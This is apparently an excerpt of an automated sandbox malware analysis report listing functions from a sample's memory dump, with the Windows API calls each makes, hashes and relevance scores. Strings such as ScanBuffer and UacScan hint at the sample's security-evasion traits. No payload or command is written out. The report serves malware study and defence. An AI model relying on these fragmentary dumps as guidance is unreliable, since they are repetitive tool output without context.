VariantClear.OLEAUT32(?), ref: 02D1F6EF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 23d3a55f07377d965acf7ccac9ff79b6a77cd58b68609fb742485c57cac3b92e
Instruction ID: 799de461eb58ec39e15f5fca5379babf843087db5222e2d7b5f5b7defc2fb60a
Opcode Fuzzy Hash: 23d3a55f07377d965acf7ccac9ff79b6a77cd58b68609fb742485c57cac3b92e
Instruction Fuzzy Hash: 75F0F6647043147EDB247B38FCC4A6A639AEF05300F505465E4869BF21CB24CC4BCB72

Uniqueness

Uniqueness Score: -1.00%

Function 02D15058 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02D6C8BC), ref: 02D14F76
SysAllocStringLen.OLEAUT32(?,?), ref: 02D15063
SysFreeString.OLEAUT32(00000000), ref: 02D15075

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: f46f36ae17db063219812039f4efadb23abcdbc84c1bdec671a070b6a7e02eb9
Instruction ID: b72f06e2515fcc8967b717ccbc9df6047e9b262a123a122b03043cbcd2467817
Opcode Fuzzy Hash: f46f36ae17db063219812039f4efadb23abcdbc84c1bdec671a070b6a7e02eb9
Instruction Fuzzy Hash: B1E0ECB8106202BDEF186A64A841B36326AEF81711F548499A900CABA4DB39CC51DE34

Uniqueness

Uniqueness Score: -1.00%

Function 02D2F2B8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02D2F5B6

Strings

H, xrefs: 02D2F36D

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 5855b8e72bea0a7e047b0413ea56e6d1580ceac0d297eeb17e9cce8aee6b4b2d
Instruction ID: aabdaa70c75275c42304e0a660e859c6b5b75deaf8bd1351ab0264868d504d74
Opcode Fuzzy Hash: 5855b8e72bea0a7e047b0413ea56e6d1580ceac0d297eeb17e9cce8aee6b4b2d
Instruction Fuzzy Hash: CEB10574A01218EFDB14CF98E480A9DBBF6FF99318F248569E845AB720D731AC49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02D304B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,02D30518), ref: 02D304E6

Strings

MS Shell Dlg 2, xrefs: 02D304B7

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: e28fcff4a8da97249520df29db45a69fcd7c12588912b8ec32b555d3b47b9d96
Instruction ID: 99df2fdbd6d686c28e03b798c5e1409158514fe451dc472542eea5d4655da3cd
Opcode Fuzzy Hash: e28fcff4a8da97249520df29db45a69fcd7c12588912b8ec32b555d3b47b9d96
Instruction Fuzzy Hash: 39F0A77230D2447FD705EAACAD40BAB7BDDDB85310F05807AF948C7682DA20CC0887B1

Uniqueness

Uniqueness Score: -1.00%

Function 02D304B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,02D30518), ref: 02D304E6

Strings

MS Shell Dlg 2, xrefs: 02D304B5, 02D304B7

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: 86803a3f376fbe8992db420e9bb3628c4c4606012ab9c30d8a1e3fb965faf285
Instruction ID: 1a0c1e76d9b090975389c2485ae864d2c5c2b08f8932cc869fd34fc93e0d7efc
Opcode Fuzzy Hash: 86803a3f376fbe8992db420e9bb3628c4c4606012ab9c30d8a1e3fb965faf285
Instruction Fuzzy Hash: 51F030723092087BD704EAADAD40FAB6BDDDB84351F05803AB948C7641DA21DC0987B1

Uniqueness

Uniqueness Score: -1.00%

Function 02D1FADC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02D1FAFD

Part of subcall function 02D1F6E0: VariantClear.OLEAUT32(?), ref: 02D1F6EF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 4e76ec8b1d1750e3d761e55e7927d97fd24e765d081fa2fb2dbc92fc0b60d0fb
Instruction ID: 61aaf9f1119dd7b43fc1406262735a9d33080f4dc11fcb2a3b70963431033522
Opcode Fuzzy Hash: 4e76ec8b1d1750e3d761e55e7927d97fd24e765d081fa2fb2dbc92fc0b60d0fb
Instruction Fuzzy Hash: EE11A520704310BFC724AF29EAD0A6763D6DF89360B148825E88ACBF55DB34CC40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D30268 Relevance: 3.0, APIs: 2, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegFlushKey.ADVAPI32(00000000,?,02D302D4,?,?,00000000,02D30480,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 02D30279
RegCloseKey.ADVAPI32(00000000,?,02D302D4,?,?,00000000,02D30480,00000000,00000000,00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 02D30282

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CloseFlush
String ID:
API String ID: 320916635-0
Opcode ID: 02ee3579b5a880e4b24f687c84fa957c9b40902f9c4a333178dfee2bb95cbb46
Instruction ID: 1e826b12bb0f86b0671f251a05a85b57dfde1ce54043fc3b923f15cde8300d53
Opcode Fuzzy Hash: 02ee3579b5a880e4b24f687c84fa957c9b40902f9c4a333178dfee2bb95cbb46
Instruction Fuzzy Hash: 54D017A4701204AACF91EFB8D9C0B167BDDAF08201F08C4A59808CF646D634C880CF70

Uniqueness

Uniqueness Score: -1.00%

Function 02D1F778 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02D1F7B8

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 66932f119c5e2a0e8212dce2f55c2ebd28bd6e736a16d0004e78f6da57a13437
Instruction ID: 728c633fec95220c475c8601d7ba472a80982338c8bb4a07e94075845a0940d4
Opcode Fuzzy Hash: 66932f119c5e2a0e8212dce2f55c2ebd28bd6e736a16d0004e78f6da57a13437
Instruction Fuzzy Hash: C0316DB2A04308BFDB10DFA8E884AAA77E9EF09318F644561E905D3F50D330DE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D302FA Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,02D30496), ref: 02D30368

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: f741ed8b2f50dbc2f7d7e85c0d4d84f5050dac0372dda6810a9b333b23091f38
Instruction ID: 30a26b744830e97ebc230ca98c11f1eda39f36b463c4280fe175887f911dddeb
Opcode Fuzzy Hash: f741ed8b2f50dbc2f7d7e85c0d4d84f5050dac0372dda6810a9b333b23091f38
Instruction Fuzzy Hash: 0221AE34B04308BFEB12EBA4E951B9EB3FAEB08305F104079A845E3781DB759F04DA60

Uniqueness

Uniqueness Score: -1.00%

Function 02D305A2 Relevance: 1.5, APIs: 1, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 02D305CF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f5ca9129e25eab8a53cb25165752b74f8c7315d6c1a4a1b8ca6f3eb32d351687
Instruction ID: 0051b7978b904d26909de6018c1456dbcb44e7382af3d4b8033bbeb0e566b2d6
Opcode Fuzzy Hash: f5ca9129e25eab8a53cb25165752b74f8c7315d6c1a4a1b8ca6f3eb32d351687
Instruction Fuzzy Hash: FC012C76A44108BBD700DEA8DD80E9AB7ADDB59310F148166BD18DB341DA71DE048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D305A4 Relevance: 1.5, APIs: 1, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 02D305CF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 8e6a06f15c5d72309d304f8ffded97ac0314ef65d722fc90950076a045cb8189
Instruction ID: f98635d891f4ef58b0ab2139972ae2de5d98f1d9a08300a9f30caed6f4895e36
Opcode Fuzzy Hash: 8e6a06f15c5d72309d304f8ffded97ac0314ef65d722fc90950076a045cb8189
Instruction Fuzzy Hash: C2014F76A44108BBD700DEA8DD80E9FB7ADDB59310F148166ED18DB341DA71DE048BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D137C4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CompareStringA.KERNEL32(00000800,00000001,00000000,00000000,00000000,00000000,00000000,02D1384B), ref: 02D1382A

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: 6f5c2302127b97e0360e33a9808e58e5259363ebc5c2f36fc6cac24188ddaa0a
Instruction ID: 2655cbf38f5b3b65791b30596e756baaf963dda86b11b7a7e89b6a059bac2ccb
Opcode Fuzzy Hash: 6f5c2302127b97e0360e33a9808e58e5259363ebc5c2f36fc6cac24188ddaa0a
Instruction Fuzzy Hash: 6001AD74604208BBEB15FB68BD8299E77AEEB48700F1244B4B409E3B51DB705F049E74

Uniqueness

Uniqueness Score: -1.00%

Function 02D1739A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D173DB

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0cd266261e671fc3532ca77ea4fecfc5841a19a4d11adf375a721a6b08f45348
Instruction ID: 1e42c1d9ea4cc88c423e722c82d3fc062c1cba1293f747f861b639e7afb9ff4f
Opcode Fuzzy Hash: 0cd266261e671fc3532ca77ea4fecfc5841a19a4d11adf375a721a6b08f45348
Instruction Fuzzy Hash: A5F07AB2700118BF9B80DE9DEC84E9BB7ECEB4C2A0B054165BA08D3300D631ED108BB4

Uniqueness

Uniqueness Score: -1.00%

Function 02D1739C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D173DB

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b76c80d1f9fd9e707a2847fb869bfe5c40af21ca40ad1edf686baa88982fbddc
Instruction ID: 5bc68800853bc5ecbc291d59171845b694fc0f75a75a3385543fe22fb35d8a9f
Opcode Fuzzy Hash: b76c80d1f9fd9e707a2847fb869bfe5c40af21ca40ad1edf686baa88982fbddc
Instruction Fuzzy Hash: A4F07AB2600118BF9B80DE9DEC84E9BB7ECEB4C2A0B054165BA08D3300D631ED108BB4

Uniqueness

Uniqueness Score: -1.00%

Function 02D2EF48 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02D2EF95,?,?,?,00000000), ref: 02D2EF75

Part of subcall function 02D14F68: SysFreeString.OLEAUT32(02D6C8BC), ref: 02D14F76

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 65ead23f2f8bfd7049e8bd956a9dbc817fad430ded503300a47cf8779c8a69c5
Instruction ID: 590110d75ead895a2c5c71841928c43bb4407e7ff6a771670ab7a773126ee582
Opcode Fuzzy Hash: 65ead23f2f8bfd7049e8bd956a9dbc817fad430ded503300a47cf8779c8a69c5
Instruction Fuzzy Hash: 1FE0E570204614BFE300EAA0FC01949779DDB89710FA104B1E80092B80DA746E088970

Uniqueness

Uniqueness Score: -1.00%

Function 02D15B78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02D10000,?,00000105), ref: 02D15B96

Part of subcall function 02D15DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D10000,02D7A794), ref: 02D15DF8
Part of subcall function 02D15DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D10000,02D7A794), ref: 02D15E16
Part of subcall function 02D15DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D10000,02D7A794), ref: 02D15E34
Part of subcall function 02D15DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D15E52
Part of subcall function 02D15DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D15EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D15E9B
Part of subcall function 02D15DDC: RegQueryValueExA.ADVAPI32(?,02D16048,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D15EE1,?,80000001), ref: 02D15EB9
Part of subcall function 02D15DDC: RegCloseKey.ADVAPI32(?,02D15EE8,00000000,?,?,00000000,02D15EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D15EDB

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction ID: d04529fb7aa36bf5da63ce98e7f7f182766fd5d3e71aa08ad2c6be0b4788408c
Opcode Fuzzy Hash: 3b17160cd34436c47c42d63791b6be8e89ec8c34d9187eb90482b984e983ccd8
Instruction Fuzzy Hash: CAE06DB1A01214AFCF10DE58E9C0B8733D8AB48750F404691ED58CF346D3B4DE108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D18D74 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D18D88

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction ID: 9e7ac91ca43892d3441d6ddf5efcc28944b22a147eda0ff3ccced709a595ee01
Opcode Fuzzy Hash: d4a83ef73bc856c33152c5a4506e379bca90fd87d8296263b7b9ff213f4cdc5f
Instruction Fuzzy Hash: 26D05B723082107FE220955AAC44FAB5BDDCFC9770F100639B658C3280D720CC01C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 02D18E14 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02D7064B,ScanString,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,ScanBuffer,02DAD350,02D77B00,ScanString), ref: 02D18E1F

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7da6594d64b4a7aae67a0ac92d7e3af6fa035f1229ae39a38e47a1364ffa62a3
Instruction ID: c25a86a84ff20b6ea36ce17b73383949f78a67e150ffd888746170e6339b394a
Opcode Fuzzy Hash: 7da6594d64b4a7aae67a0ac92d7e3af6fa035f1229ae39a38e47a1364ffa62a3
Instruction Fuzzy Hash: 9AC08CF07022043A2E50EAFC3EC050A02CA8904239B241E21F428C2FE2D317CC533430

Uniqueness

Uniqueness Score: -1.00%

Function 02D14F80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02D14F93

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction ID: b0cafaaa22f5fcf2d2280bc33a85e8146c4338ed48fc2e5d9bae5c65a869f483
Opcode Fuzzy Hash: f9cf8d993bf6b984c3a206198d86c8bdb50b9fa8060aaea77c6d17370c297a51
Instruction Fuzzy Hash: 9EC012B16512216BFB719658ECC0B5562CCDB05355F5400A1E508DB780E370DC008760

Uniqueness

Uniqueness Score: -1.00%

Function 02D14FA4 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02D6C8BC), ref: 02D14F76
SysReAllocStringLen.OLEAUT32(02D78B70,02D6C8BC,00000016), ref: 02D14FBE

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction ID: 353fbd7605708ec0acc1652ac1e457c95bfaedccf36d00bf524ebe4dfa7f0aaa
Opcode Fuzzy Hash: 93a5ce073feb878bcb9b2f43cb14a0c0014240474e4f6b899e299ef47583e6fd
Instruction Fuzzy Hash: 29D080F4104202B99F2C5514B5158367169DAD1305F8EC25D5C0247FC0E735CC01DB70

Uniqueness

Uniqueness Score: -1.00%

Function 02D18DF0 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02D6D4E6,ScanString,02DAD350,02D77B00,OpenSession,02DAD350,02D77B00,ScanString,02DAD350,02D77B00,UacScan,02DAD350,02D77B00,UacInitialize), ref: 02D18DFB

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 39fe18bb205e51def89fab98bbaf0f68bc786708221df5cd769497ab7b9a3e21
Instruction ID: 87fe976a271762053971bd15a39c9bb76e951a0f9268cfe5c5820e3d737a0d48
Opcode Fuzzy Hash: 39fe18bb205e51def89fab98bbaf0f68bc786708221df5cd769497ab7b9a3e21
